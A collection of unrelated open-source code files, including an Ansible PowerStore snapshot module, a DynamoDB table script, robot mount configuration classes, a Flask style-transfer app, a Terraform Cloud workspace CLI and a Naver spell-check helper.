self.validate_expiration_timestamp(expiration_timestamp)
if desired_retention is not None:
self.validate_desired_retention(desired_retention)
if volume is not None:
volume_id = self.get_vol_id_from_volume(volume)
elif volume_group is not None:
volume_group_id = self.get_vol_group_id_from_vg(volume_group)
if volume is not None:
snapshot = self.get_vol_snapshot(volume_id, snapshot_name,
snapshot_id)
elif volume_group is not None:
snapshot = self.get_vol_group_snapshot(volume_group_id,
snapshot_name,
snapshot_id)
is_snap_modified = False
snapshot_modification_details = dict()
if snapshot is not None:
is_snap_modified, snapshot_modification_details = \
self.check_snapshot_modified(snapshot,
volume,
volume_group,
description,
desired_retention,
retention_unit,
expiration_timestamp)
if state == 'present' and volume and not snapshot:
LOG.info("Creating new snapshot: {0} for volume: {1}".format(
snapshot_name, volume))
result['create_vol_snap'], result['snap_details'] = \
self.create_vol_snapshot(snapshot_name,
description,
volume_id,
desired_retention,
retention_unit,
expiration_timestamp,
new_snapshot_name)
elif state == 'absent' and (snapshot_name or snapshot_id) and \
volume and snapshot:
LOG.info("Deleting snapshot {0} for Volume {1}".format(
snapshot['name'], volume))
result['delete_vol_snap'] = \
self.delete_vol_snapshot(snapshot)
if state == 'present' and volume_group and not snapshot:
LOG.info("Creating new snapshot: {0} for VG: {1}".format(
snapshot_name, volume_group))
result['create_vg_snap'], result['snap_details'] = \
self.create_vg_snapshot(snapshot_name,
description,
volume_group_id,
desired_retention,
retention_unit,
expiration_timestamp,
new_snapshot_name)
elif state == 'absent' and (
snapshot_name or snapshot_id) and volume_group \
and snapshot:
LOG.info("Deleting snapshot {0} for VG {1}".format(
snapshot['name'], volume_group))
result['delete_vg_snap'] = \
self.delete_vol_group_snapshot(snapshot)
if state == 'present' and volume and new_snapshot_name:
LOG.info("Renaming snapshot {0} to new name {1}".format(
snapshot['name'], new_snapshot_name))
result['modify_vol_snap'] = self.rename_vol_snapshot(
snapshot, new_snapshot_name)
elif state == 'present' and volume_group \
and new_snapshot_name:
LOG.info("Renaming snapshot {0} to new name {1}".format(
snapshot['name'], new_snapshot_name))
result['modify_vg_snap'] = self.rename_vol_group_snapshot(
snapshot, new_snapshot_name)
if state == 'present' and snapshot and volume and is_snap_modified:
LOG.info("Modifying snapshot {0}".format(snapshot['name']))
result['modify_vol_snap'], result['snap_details'] = \
self.modify_vol_snapshot(snapshot,
snapshot_modification_details) or \
result['modify_vol_snap']
elif state == 'present' and snapshot and volume_group \
and is_snap_modified:
LOG.info("Modifying snapshot {0}".format(snapshot['name']))
result['modify_vg_snap'], result['snap_details'] = \
self.modify_vol_group_snapshot(
snapshot,
snapshot_modification_details) or \
result['modify_vg_snap']
if state == 'present' and (snapshot_name or snapshot_id) and volume \
and not desired_retention \
and not expiration_timestamp:
result['snap_details'] = self.get_vol_snap_details(snapshot)
elif state == 'present' and (snapshot_name or snapshot_id) \
and volume_group and not desired_retention \
and not expiration_timestamp:
result['snap_details'] = self.get_vol_group_snap_details(
snapshot)
if result['create_vol_snap'] or result['delete_vol_snap'] or result[
'modify_vol_snap'] or result['create_vg_snap'] \
or result['delete_vg_snap'] or result['modify_vg_snap']:
result['changed'] = True
# Finally update the module result!
self.module.exit_json(**result)
def get_powerstore_snapshot_parameters():
return dict(
volume_group=dict(required=False, type='str'),
volume=dict(required=False, type='str'),
snapshot_name=dict(required=False, type='str'),
snapshot_id=dict(required=False, type='str'),
new_snapshot_name=dict(required=False, type='str'),
desired_retention=dict(required=False, type='str'),
retention_unit=dict(required=False, choices=['hours', 'days'],
type='str'),
expiration_timestamp=dict(required=False, type='str'),
description=dict(required=False, type='str'),
state=dict(required=True, choices=['present', 'absent'],
type='str')
)
def main():
"""Create PowerStore Snapshot object and perform action on it
based on user input from playbook"""
obj = PowerStoreSnapshot()
obj.perform_module_operation()
if __name__ == '__main__':
main()
| avs6/ansible-powerstore | dellemc_ansible/powerstore/library/dellemc_powerstore_snapshot.py | dellemc_powerstore_snapshot.py | py | 39,907 | python | en | code | 0 | github-code | 36 |
35864084249 | from __future__ import print_function
import boto3
#This module creates a table with the table constraints as well
dynamodb = boto3.resource('dynamodb', region_name='us-west-2', endpoint_url='http://localhost:8000', aws_access_key_id='Secret', aws_secret_access_key='Secret')
table = dynamodb.create_table(
TableName = 'Movies',
KeySchema=[
{
'AttributeName': 'year',
'KeyType': 'HASH' #Partition key
},
{
'AttributeName': 'title',
'KeyType': 'RANGE' #Sort key
}
],
AttributeDefinitions=[
{
'AttributeName': 'year',
'AttributeType': 'N'
},
{
'AttributeName': 'title',
'AttributeType': 'S'
},
],
ProvisionedThroughput={
'ReadCapacityUnits': 10,
'WriteCapacityUnits': 10
}
) | Codexdrip/DynamoDB-Testing | MoviesCreateTable.py | MoviesCreateTable.py | py | 894 | python | en | code | 0 | github-code | 36 |
15672387350 | from clearpath_config.common.types.config import BaseConfig
from clearpath_config.common.types.list import OrderedListConfig
from clearpath_config.common.utils.dictionary import flip_dict
from clearpath_config.mounts.types.fath_pivot import FathPivot
from clearpath_config.mounts.types.flir_ptu import FlirPTU
from clearpath_config.mounts.types.mount import BaseMount
from clearpath_config.mounts.types.pacs import PACS
from clearpath_config.mounts.types.post import Post
from clearpath_config.mounts.types.sick import SICKStand
from clearpath_config.mounts.types.disk import Disk
from typing import List
class Mount():
FATH_PIVOT = FathPivot.MOUNT_MODEL
FLIR_PTU = FlirPTU.MOUNT_MODEL
PACS_RISER = PACS.Riser.MOUNT_MODEL
PACS_BRACKET = PACS.Bracket.MOUNT_MODEL
MODEL = {
FATH_PIVOT: FathPivot,
FLIR_PTU: FlirPTU,
PACS_RISER: PACS.Riser,
PACS_BRACKET: PACS.Bracket
}
def __new__(cls, model: str) -> BaseMount:
assert model in Mount.MODEL, (
"Model '%s' must be one of: '%s'" % (
model,
Mount.MODEL.keys()
)
)
return Mount.MODEL[model]()
class MountListConfig(OrderedListConfig[BaseMount]):
def __init__(self) -> None:
super().__init__(obj_type=BaseMount)
def to_dict(self) -> List[dict]:
d = []
for accessory in self.get_all():
d.append(accessory.to_dict())
return d
class MountsConfig(BaseConfig):
MOUNTS = "mounts"
BRACKET = PACS.Bracket.MOUNT_MODEL
FATH_PIVOT = FathPivot.MOUNT_MODEL
RISER = PACS.Riser.MOUNT_MODEL
SICK = SICKStand.MOUNT_MODEL
POST = Post.MOUNT_MODEL
DISK = Disk.MOUNT_MODEL
TEMPLATE = {
MOUNTS: {
BRACKET: BRACKET,
FATH_PIVOT: FATH_PIVOT,
RISER: RISER,
SICK: SICK,
POST: POST,
DISK: DISK,
}
}
KEYS = flip_dict(TEMPLATE)
DEFAULTS = {
BRACKET: [],
FATH_PIVOT: [],
RISER: [],
SICK: [],
POST: [],
DISK: [],
}
def __init__(
self,
config: dict = {},
bracket: List[PACS.Bracket] = DEFAULTS[BRACKET],
fath_pivot: List[FathPivot] = DEFAULTS[FATH_PIVOT],
riser: List[PACS.Riser] = DEFAULTS[RISER],
sick_stand: List[SICKStand] = DEFAULTS[SICK],
post: List[Post] = DEFAULTS[POST],
disk: List[Disk] = DEFAULTS[DISK],
) -> None:
# Initialization
self.bracket = bracket
self.fath_pivot = fath_pivot
self.riser = riser
self.sick_stand = sick_stand
self.post = post
self.disk = disk
# Template
template = {
self.KEYS[self.BRACKET]: MountsConfig.bracket,
self.KEYS[self.FATH_PIVOT]: MountsConfig.fath_pivot,
self.KEYS[self.RISER]: MountsConfig.riser,
self.KEYS[self.SICK]: MountsConfig.sick_stand,
self.KEYS[self.POST]: MountsConfig.post,
self.KEYS[self.DISK]: MountsConfig.disk,
}
super().__init__(template, config, self.MOUNTS)
@property
def bracket(self) -> OrderedListConfig:
self.set_config_param(
key=self.KEYS[self.BRACKET],
value=self._bracket.to_dict()
)
return self._bracket
@bracket.setter
def bracket(self, value: List[dict]) -> None:
assert isinstance(value, list), (
"Mounts must be list of 'dict'")
assert all([isinstance(i, dict) for i in value]), (
"Mounts must be list of 'dict'")
mounts = MountListConfig()
mount_list = []
for d in value:
mount = PACS.Bracket()
mount.from_dict(d)
mount_list.append(mount)
mounts.set_all(mount_list)
self._bracket = mounts
@property
def riser(self) -> OrderedListConfig:
self.set_config_param(
key=self.KEYS[self.RISER],
value=self._riser.to_dict()
)
return self._riser
@riser.setter
def riser(self, value: List[dict]) -> None:
assert isinstance(value, list), (
"Mounts must be list of 'dict'")
assert all([isinstance(i, dict) for i in value]), (
"Mounts must be list of 'dict'")
mounts = MountListConfig()
mount_list = []
for d in value:
mount = PACS.Riser(rows=1, columns=1)
mount.from_dict(d)
mount_list.append(mount)
mounts.set_all(mount_list)
self._riser = mounts
@property
def fath_pivot(self) -> OrderedListConfig:
self.set_config_param(
key=self.KEYS[self.FATH_PIVOT],
value=self._fath_pivot.to_dict()
)
return self._fath_pivot
@fath_pivot.setter
def fath_pivot(self, value: List[dict]) -> None:
assert isinstance(value, list), (
"Mounts must be list of 'dict'")
assert all([isinstance(i, dict) for i in value]), (
"Mounts must be list of 'dict'")
mounts = MountListConfig()
mount_list = []
for d in value:
mount = FathPivot()
mount.from_dict(d)
mount_list.append(mount)
mounts.set_all(mount_list)
self._fath_pivot = mounts
@property
def sick_stand(self) -> OrderedListConfig:
self.set_config_param(
key=self.KEYS[self.SICK],
value=self._sick.to_dict()
)
return self._sick
@sick_stand.setter
def sick_stand(self, value: List[dict]) -> None:
assert isinstance(value, list), (
"Mounts must be list of 'dict'")
assert all([isinstance(i, dict) for i in value]), (
"Mounts must be list of 'dict'")
mounts = MountListConfig()
mount_list = []
for d in value:
mount = SICKStand()
mount.from_dict(d)
mount_list.append(mount)
mounts.set_all(mount_list)
self._sick = mounts
@property
def post(self) -> OrderedListConfig:
self.set_config_param(
key=self.KEYS[self.POST],
value=self._post.to_dict()
)
return self._post
@post.setter
def post(self, value: List[dict]) -> None:
assert isinstance(value, list), (
"Mounts must be list of 'dict'")
assert all([isinstance(i, dict) for i in value]), (
"Mounts must be list of 'dict'")
mounts = MountListConfig()
mount_list = []
for d in value:
mount = Post()
mount.from_dict(d)
mount_list.append(mount)
mounts.set_all(mount_list)
self._post = mounts
@property
def disk(self) -> OrderedListConfig:
self.set_config_param(
key=self.KEYS[self.DISK],
value=self._disk.to_dict()
)
return self._disk
@disk.setter
def disk(self, value: List[dict]) -> None:
assert isinstance(value, list), (
"Mounts must be list of 'dict'")
assert all([isinstance(i, dict) for i in value]), (
"Mounts must be list of 'dict'")
mounts = MountListConfig()
mount_list = []
for d in value:
mount = Disk()
mount.from_dict(d)
mount_list.append(mount)
mounts.set_all(mount_list)
self._disk = mounts
# Get All Mounts
def get_all_mounts(self) -> List[BaseMount]:
mounts = []
mounts.extend(self.fath_pivot.get_all())
mounts.extend(self.riser.get_all())
mounts.extend(self.bracket.get_all())
mounts.extend(self.sick_stand.get_all())
mounts.extend(self.post.get_all())
mounts.extend(self.disk.get_all())
return mounts
| clearpathrobotics/clearpath_config | clearpath_config/mounts/mounts.py | mounts.py | py | 7,899 | python | en | code | 1 | github-code | 36 |
36094711488 | from merchant import Merchant
from enemy import Enemy
from monster import Monster
characters = {
"Gary": Merchant("Gary", None, 50, 12, 15000, 10, 3, "Here to buy and sell goods."),
"Rebecca": Merchant("Rebecca", None, 15, 7, 200, 1, 1, "Here to buy and sell goods"),
"Thug": Enemy("Thug", None, 180, 7, 5, 1, 1, "Looks kind of menacing.", 10),
"Goblin": Monster("Goblin", None, 150, 7, 2, 1, 1, "Just a filthy, green goblin", ['bite', 'scratch'], 5),
"Troll": Monster("Troll", None, 250, 4, 2, 10, 7, "Yikes, a troll...", ['clobber'], 50),
"Imp": Monster("Imp", None, 70, 5, 2, 1, 1, "Full of mischeif", ['bite', 'scratch'], 5),
"Hydra": Monster("Hydra", None, 2500, 50, 25, 10, 25, "If the legends are true, I don't want to fight this.", ['strike', 'wrap'], 100),
"Weapons Master": Enemy("Weapons Master", None, 2000, 75, 52, 100, 91, "The renowned weapons expert. I'd hate to be in a dual with him.", 2500),
"Dragon": Monster("Dragon", None, 5000, 100, 2000, 150, 75, "Well, there's the treasure...and unfortunately the dragon.", ['fire breath', 'stomp', 'strike', 'chomp'], 5000)
}
characters["Gary"].spawn_inventory("iron dagger")
characters["Gary"].spawn_inventory("steel dagger")
characters["Gary"].spawn_inventory("rusty iron armor")
characters["Gary"].spawn_inventory("iron armor")
characters["Gary"].spawn_inventory("steel armor")
characters["Gary"].spawn_inventory("plasma cutter")
characters["Rebecca"].spawn_inventory("book: zap")
characters["Rebecca"].spawn_inventory("book: burn")
characters["Rebecca"].spawn_inventory("book: chill")
characters["Rebecca"].spawn_inventory("book: ensnare")
characters["Rebecca"].spawn_inventory("book: summon")
characters["Thug"].spawn_item("iron dagger")
characters["Thug"].spawn_rare_item("steel dagger")
characters["Imp"].spawn_rare_item("sapphire")
characters["Troll"].spawn_item("ruby")
characters["Troll"].spawn_loot("club")
characters["Weapons Master"].spawn_loot("steel sword")
characters["Weapons Master"].spawn_loot("steel armor")
characters["Hydra"].spawn_loot("diamond")
def return_invalid():
print("Invalid target")
def is_character(target):
if target in characters:
return True
else:
return_invalid()
def validate_barter(target):
if is_character(target) == True:
if isinstance(characters[target], Merchant):
return True
else:
return_invalid()
def validate_battle(target):
if is_character(target) == True:
if isinstance(characters[target], Enemy) or isinstance(target, Monster):
return True
else:
return_invalid()
| wildcard329/python_game | npc_roster.py | npc_roster.py | py | 2,643 | python | en | code | 0 | github-code | 36 |
5232319809 | from openpyxl import Workbook
wb = Workbook()
ws = wb.active
# [현재까지 작성된 최종 성적 데이터]
data = [["학번", "출석", "퀴즈1", "퀴즈2", "중간고사", "기말고사", "프로젝트"],
[1,10,8,5,14,26,12],
[2,7,3,7,15,24,18],
[3,9,5,8,8,12,4],
[4,7,8,7,17,21,18],
[5,7,8,7,16,25,15],
[6,3,5,8,8,17,0],
[7,4,9,10,16,27,18],
[8,6,6,6,15,19,17],
[9,10,10,9,19,30,19],
[10,9,8,8,20,25,20]]
for x in range(1, len(data)+1) :
for y in range(1, len(data[0])+1):
ws.cell(row=x, column=y, value=data[x-1][y-1])
# 1. 퀴즈 2 점수를 10으로 수정
for idx, cell in enumerate(ws["D"]):
if idx == 0: # 제목인 경우 skip
continue
cell.value = 10
# 2. 총점 정보 추가
ws["H1"] = "총점"
ws["I1"] = "성적"
for idx, score in enumerate(data, start=1):
if idx == 1:
continue
sum_val = sum(score[1:]) - score[3] + 10 # 총점
ws.cell(row=idx, column=8).value="=SUM(B{}:G{})".format(idx, idx)
# 총점 별로 성적 부과
grade = None
if sum_val >= 90:
grade = "A"
elif sum_val >= 80:
grade = "B"
elif sum_val >= 70:
grade = "C"
else:
grade = "D"
# 출석 5점 미만이면 F
if score[1] < 5:
grade = "F"
ws.cell(row=idx, column=9).value = grade
wb.save("scores.xlsx") | OctoHoon/PythonStudy_rpa | rpa_basic/1_excel/17_quiz.py | 17_quiz.py | py | 1,382 | python | en | code | 0 | github-code | 36 |
33039113496 | from mc.net.minecraft.mob.ai.BasicAttackAI import BasicAttackAI
class JumpAttackAI(BasicAttackAI):
def __init__(self):
super().__init__()
self.runSpeed *= 8.0
def _jumpFromGround(self):
if not self.attackTarget:
super()._jumpFromGround()
else:
self.mob.xd = 0.0
self.mob.zd = 0.0
self.mob.moveRelative(0.0, 1.0, 0.6)
self.mob.yd = 0.5
| pythonengineer/minecraft-python | mc/net/minecraft/mob/ai/JumpAttackAI.py | JumpAttackAI.py | py | 438 | python | en | code | 2 | github-code | 36 |
14198442268 | import os
from flask import Flask, render_template, request
import base64
from io import BytesIO
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import src.components.data_ingestion as DI
from src.components.model_trainer import modelTrain
from werkzeug.utils import secure_filename
app = Flask(__name__)
app.config["UPLOAD_FOLDER"] = os.path.abspath(os.path.join(os.path.dirname(__file__), 'static', 'uploads'))
content_dir = DI.default_content_dir
style_dir = DI.default_style_dir
@app.route('/')
def index():
# Get content and style image filenames from src/components/data directory
content_images = [f for f in os.listdir(content_dir) if f.endswith('.jpg' or '.png' or '.jpeg')]
style_images = [f for f in os.listdir(style_dir) if f.endswith('.jpg' or '.png' or '.jpeg')]
return render_template('index.html', content_images=content_images, style_images=style_images)
@app.route('/transfer', methods=['POST'])
def transfer_style():
# Retrieve user input from the form
epochs = int(request.form['epochs'])
learning_rate = float(request.form['learningRate'])
alpha = float(request.form['alpha'])
beta = float(request.form['beta'])
selected_source = request.form.get("imageSource")
content_image = request.form.get('contentImage')
style_image = request.form.get('styleImage')
if selected_source == 'default':
content_image_path = os.path.join(content_dir, content_image)
style_image_path = os.path.join(style_dir, style_image)
elif selected_source == 'custom_image':
custom_content = request.files.get('customContentImage')
content_image_filename = secure_filename(custom_content.filename)
content_image_path = os.path.join(app.config['UPLOAD_FOLDER'], content_image_filename)
os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)
print("Content Image Path:", content_image_path)
custom_content.save(content_image_path)
style_image_path = os.path.join(style_dir, style_image)
elif selected_source == 'custom_style':
custom_style = request.files.get('customStyleImage')
style_image_filename = secure_filename(custom_style.filename)
style_image_path = os.path.join(app.config['UPLOAD_FOLDER'], style_image_filename)
print("Style Image Path:", style_image_path)
os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)
custom_style.save(style_image_path)
content_image_path = os.path.join(content_dir, content_image)
elif selected_source == 'custom':
custom_content = request.files.get('customContentImage')
content_image_filename = secure_filename(custom_content.filename)
content_image_path = os.path.join(app.config['UPLOAD_FOLDER'], content_image_filename)
os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)
print("Content Image Path:", content_image_path)
custom_content.save(content_image_path)
custom_style = request.files.get('customStyleImage')
style_image_filename = secure_filename(custom_style.filename)
style_image_path = os.path.join(app.config['UPLOAD_FOLDER'], style_image_filename)
print("Style Image Path:", style_image_path)
os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)
custom_style.save(style_image_path)
# Perform style transfer
test = modelTrain(content_image_path, style_image_path)
generated_image = test.train(epochs=epochs, lr=learning_rate, alpha=alpha, beta=beta)
# Convert the generated image to base64 and pass it to the template
buffer = BytesIO()
plt.imshow(generated_image)
plt.axis('off')
plt.savefig(buffer, format='png', bbox_inches='tight', pad_inches=0)
buffer.seek(0)
img_str = base64.b64encode(buffer.getvalue()).decode('utf-8')
return render_template('result.html', img_data=img_str)
if __name__ == "__main__":
app.run(debug=True)
| al0nkr/style-transfer-nn | app.py | app.py | py | 3,973 | python | en | code | 0 | github-code | 36 |
11867021952 | # -----------------------------------------------------------------------------
# main.py
#
# Hung-Ruey Chen 109971346
# -----------------------------------------------------------------------------
import sys, os
import ply.lex as lex
import ply.yacc as yacc
from token_def import *
# Build the lexer
def main():
log.debug(sys.argv[1])
sys.stderr = open(os.devnull, 'w')
# lex.lex(debug=True)
lex.lex()
yacc.yacc()
sys.stderr = sys.__stderr__
r = open(sys.argv[1])
code = ""
for line in r:
code += line.strip() + "\n"
logging.debug(code)
try:
lex.input(code)
while True:
token = lex.token()
if not token: break
logging.debug(token)
# ast = yacc.parse(code, debug=True)
ast = yacc.parse(code)
ast.execute()
except Exception as e:
logging.debug(e)
r.close()
if __name__ == '__main__':
main() | vbigmouse/CSE307 | HW5/main.py | main.py | py | 949 | python | en | code | 0 | github-code | 36 |
12177872909 | import requests
import urllib.parse
main_api = "https://www.mapquestapi.com/directions/v2/route?"
key = "p0Modq3JoAtVS6BXK5P5CinXWhJNUQwI"
while True:
orig = input("Starting Location: ")
dest = input("Destination: ")
url = main_api + urllib.parse.urlencode({
"key" : key,
"from" : orig,
"to" : dest
})
json_data = requests.get(url).json()
json_status = json_data["info"]["statuscode"]
print(f"URL: {url}")
if json_status == 0:
print(f"API Status: {json_status} = A successfull route call.\n") | JerickoDeGuzman/MapQuest-Feature-Enhancement | tempdir/referenceFiles/mapquest_parse-json_3.py | mapquest_parse-json_3.py | py | 561 | python | en | code | 0 | github-code | 36 |
8473901690 | #!/usr/bin/env python3
############
## https://gist.github.com/DevBOFH/7bd65dbcb945cdfce42d21b1b6bc0e1b
############
##
##
description = 'Terraform workspace tool. This tool can be used to perform CRUD operations on Terraform Cloud via their public API.'
version = "0.0.1"
import os
import re
import sys
import requests
import argparse
import json
ORGANIZATION = "TF_CLOUD_ORG_NAME"
HEADERS = {"Content-Type": "application/vnd.api+json"}
def load_api_credentials(rc_path="~/.terraformrc"):
with open(os.path.expanduser(rc_path)) as f:
m = re.search(r'token = "([^"]+)"', f.read())
if not m:
raise RuntimeError(f"Unable to load credentials from {rc_path}")
else:
HEADERS["Authorization"] = f"Bearer {m.group(1)}"
def new_workspace(workspace_name):
PAYLOAD = {'data': {'attributes': {'name': workspace_name}, 'type': 'workspaces'}}
req = requests.post(
f"https://app.terraform.io/api/v2/organizations/{ORGANIZATION}/workspaces",
json=PAYLOAD,
headers=HEADERS,
)
try:
req.raise_for_status()
except requests.exceptions.HTTPError as err:
print (str(err))
sys.exit(2)
def show_workspace(workspace_name):
req = requests.get(
f"https://app.terraform.io/api/v2/organizations/{ORGANIZATION}/workspaces/{workspace_name}",
headers=HEADERS,
)
try:
req.raise_for_status()
except requests.exceptions.HTTPError as err:
sys.exit(0)
pretty_json = json.loads(req.text)
print (json.dumps(pretty_json, indent=2))
def configure_workspace_by_name(workspace_name):
PAYLOAD = {"data": {"type": "workspaces", "attributes": {"operations": False}}}
req = requests.patch(
f"https://app.terraform.io/api/v2/organizations/{ORGANIZATION}/workspaces/{workspace_name}",
json=PAYLOAD,
headers=HEADERS,
)
try:
req.raise_for_status()
except requests.exceptions.HTTPError as err:
print (str(err))
sys.exit(2)
def configure_workspace_by_id(workspace_id):
PAYLOAD = {"data": {"type": "workspaces", "attributes": {"operations": False}}}
req = requests.patch(
f"https://app.terraform.io/api/v2/workspaces/{workspace_id}",
json=PAYLOAD,
headers=HEADERS,
)
try:
req.raise_for_status()
except requests.exceptions.HTTPError as err:
print (str(err))
sys.exit(2)
def configure_all_workspaces():
next_page = "https://app.terraform.io/api/v2/organizations/" + ORGANIZATION + "/workspaces"
while next_page:
page = requests.get(next_page, headers=HEADERS).json()
for i in page["data"]:
ws_id = i["id"]
ws_name = i["attributes"]["name"]
print(f"Updating {ws_name}")
try:
configure_workspace_by_id(i["id"])
except requests.exceptions.HTTPError as exc:
print(f"Error updating {ws_id} {ws_name}: {exc}", file=sys.stderr)
next_page = page["links"].get("next")
def delete_workspace(workspace_name):
PAYLOAD = {'data': {'attributes': {'name': workspace_name}, 'type': 'workspaces'}}
req = requests.delete(
f"https://app.terraform.io/api/v2/organizations/{ORGANIZATION}/workspaces/{workspace_name}",
headers=HEADERS,
)
try:
req.raise_for_status()
except requests.exceptions.HTTPError as err:
print (str(err))
sys.exit(2)
if __name__ == "__main__":
# init argparse
parser = argparse.ArgumentParser(description = description)
parser.add_argument("-V", "--version", help="show version", action="store_true")
parser.add_argument("-n", "--new", help="create a new workspace")
parser.add_argument("-c", "--configure", help="configure a workspace to use local execution mode")
parser.add_argument("-ca", "--configureall", help="configure all workspaces to use local execution mode", action="store_true")
parser.add_argument("-d", "--delete", help="delete a workspace")
parser.add_argument("-s", "--show", help="show details of a workspace")
# read arguments from the command line
args = parser.parse_args()
# load terraform cloud api token
load_api_credentials()
# check for --version or -V
if args.version:
print("Terraform Workspace Tool " + version )
# check for --new or -n
if args.new:
try:
new_workspace(args.new)
except AssertionError as err:
print (str(err))
sys.exit(2)
# check for --show or -s
if args.show:
try:
show_workspace(args.show)
except AssertionError as err:
print (str(err))
sys.exit(2)
# check for --configure or -c
if args.configure:
try:
configure_workspace_by_name(args.configure)
except AssertionError as err:
print (str(err))
sys.exit(2)
# check for --configureall or -ca
if args.configureall:
try:
configure_all_workspaces()
except AssertionError as err:
print (str(err))
sys.exit(2)
# check for --delete or -d
if args.delete:
try:
delete_workspace(args.delete)
except AssertionError as err:
print (str(err))
sys.exit(2)
####################################
##
##
| babywyrm/sysadmin | terraform/tf_workspace_.py | tf_workspace_.py | py | 5,404 | python | en | code | 10 | github-code | 36 |
44771319776 | def extract_info(book_list):
result = []
for book in book_list:
title = book.find("a", {"class" : "N=a:bta.title"}).string
image = book.find("img")["src"]
link = book.find("div", {"class" : "thumb_type thumb_type2"}).find("a")["href"]
author = book.find("a",{"class" : "txt_name N=a:bta.author"}).string
publisher = book.find("a", {"class" : "N=a:bta.publisher"}).text
# price_box = book.find("em",{"class" : "price"}).text.strip()
# if price != None:
# pirce = price_box.string
# else:
# price = '없음'
book_info = {
'title' : title,
'image' : image,
'link' : link,
'author' : author,
'publisher' : publisher,
# 'price_box' : price_box,
}
result.append(book_info)
return result
print(result) | sumins2/homework | session09_crawling/book.py | book.py | py | 959 | python | en | code | 0 | github-code | 36 |
16209163559 | import datetime
import os
import random
import string
from datetime import datetime
import requests
from boto3 import Session
from django.conf import settings
from django.conf.global_settings import MEDIA_ROOT
from market_backend.apps.accounts.models import Media
from market_backend.v0.accounts import serializers
class AccountsUtils:
"""
Utility methods related to Accounts Application
"""
@staticmethod
def get_user_full_name(user):
if isinstance(user, list):
user_name_list = ''
for i, _ in enumerate(user):
if i != 0:
user_name_list += ' / '
if _.first_name or _.last_name:
user_name_list += "{} {}".format(_.first_name, _.last_name)
user_name_list += "{}".format(_.username.split('@')[0])
return user_name_list
if user.first_name or user.last_name:
return "{} {}".format(user.first_name, user.last_name)
return "{}".format(user.username.split('@')[0])
@staticmethod
def get_readable_user_type(type):
return type.replace('_', ' ').lower().capitalize()
class FileUploadUtils(object):
@staticmethod
def getFileKey():
return ''.join(
random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(50))
@staticmethod
def deleteFile(key):
media = Media.objects.get(id=key)
session = Session(aws_access_key_id=settings.AWS_ACCESS_KEY,
aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,
region_name=settings.AWS_REGION_NAME)
s3 = session.resource('s3')
my_bucket = s3.Bucket(settings.AWS_BUCKET_NAME)
response = my_bucket.delete_objects(
Delete={
'Objects': [
{
'Key': media.key
}
]
}
)
media.delete()
return response
@staticmethod
def getFileName(key):
try:
file = Media.objects.get(key=key)
return file.file_name
except Exception as e:
print(e)
return None
@staticmethod
def getContentType(extension, url=None):
if extension == 'pdf':
return 'application/pdf'
elif extension == 'png':
return 'image/png'
elif extension == 'jpeg' or extension == 'jpg':
return 'image/jpeg'
else:
return 'image/jpeg'
@staticmethod
def uploadFile(url):
filename = url.split("/")[-1]
fileextension = filename.split('.')[1]
file = requests.get(url).content
filepath = os.path.join(MEDIA_ROOT, filename)
with open(filepath, 'wb') as destination:
destination.write(file)
file = open(filepath, 'rb')
extension = FileUploadUtils.getContentType(fileextension)
valid_file = True
if extension is None:
valid_file = False
session = Session(aws_access_key_id=settings.AWS_ACCESS_KEY,
aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,
region_name=settings.AWS_REGION_NAME)
s3 = session.resource('s3')
file_key = FileUploadUtils.getFileKey()
if valid_file:
res = s3.Bucket(settings.AWS_BUCKET_NAME).put_object(Key=file_key, Body=file, ContentType=extension,
ACL='public-read')
data = {'key': file_key, 'file_name': filename, 'is_link': True}
serializer = serializers.CreateFileUploadSerializer(data=data)
if serializer.is_valid():
serializer.save()
if os.path.isfile(filepath):
os.remove(filepath)
media = Media.objects.get(key=file_key)
return media
else:
return None
@staticmethod
def upload_file_by_file(file):
milli_sec = str(datetime.datetime.now())
filename = str(milli_sec) + '.pdf'
print(file)
session = Session(aws_access_key_id=settings.AWS_ACCESS_KEY,
aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,
region_name=settings.AWS_REGION_NAME)
s3 = session.resource('s3')
file_key = FileUploadUtils.getFileKey()
res = s3.Bucket(settings.AWS_BUCKET_NAME).put_object(Key=file_key, Body=file, ContentType='application/pdf',
ACL='public-read')
data = {'key': file_key, 'file_name': filename, 'is_link': False}
serializer = serializers.CreateFileUploadSerializer(data=data)
if serializer.is_valid():
serializer.save()
media = Media.objects.get(key=file_key)
return media
@staticmethod
def get_url_from_media_object(media):
return settings.AWS_S3_BASE_LINK + media.key
| muthukumar4999/market-backend | market_backend/v0/accounts/utils.py | utils.py | py | 5,060 | python | en | code | 0 | github-code | 36 |
41924245365 | from .sentence_cutting import cutting_500_under
import requests, json
def cleaned_result(final_result):
result = []
tmp = final_result.split('<br>')
WRONG_SPELLING = "<span class='red_text'>"
WRONG_SPACING = "<span class='green_text'>"
AMBIGUOUS = "<span class='violet_text'>"
STATISTICAL_CORRECTION = "<span class='blue_text'>"
for idx in range(len(tmp)):
tmp[idx] = tmp[idx].replace(WRONG_SPELLING,'<span style="color:#CC0000">')
tmp[idx] = tmp[idx].replace(WRONG_SPACING,'<span style="color:#00CC00">')
tmp[idx] = tmp[idx].replace(AMBIGUOUS,'<span style="color:#CC00CC">')
tmp[idx] = tmp[idx].replace(STATISTICAL_CORRECTION,'<span style="color:#3B78FF">')
tmp[idx] = tmp[idx].replace('"','"').replace("'","'")
if "<span" not in tmp[idx]:
tmp[idx] = f"<span>{tmp[idx]}</span>"
result.append(tmp[idx])
return result
def check(text):
base_url = 'https://m.search.naver.com/p/csearch/ocontent/spellchecker.nhn'
_agent = requests.Session()
final_result = []
if len(text) > 500:
cutted_text = cutting_500_under(text)
for sentence in cutted_text:
tmp_result = []
payload = {
'_callback': 'window.__jindo2_callback._spellingCheck_0',
'q': sentence
}
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'referer': 'https://search.naver.com/',
}
r = _agent.get(base_url, params=payload, headers=headers)
r = r.text[42:-2]
data = json.loads(r)
html = data['message']['result']['html']
tmp_result.append(html)
final_result.extend(tmp_result)
return '<br>'.join(final_result)
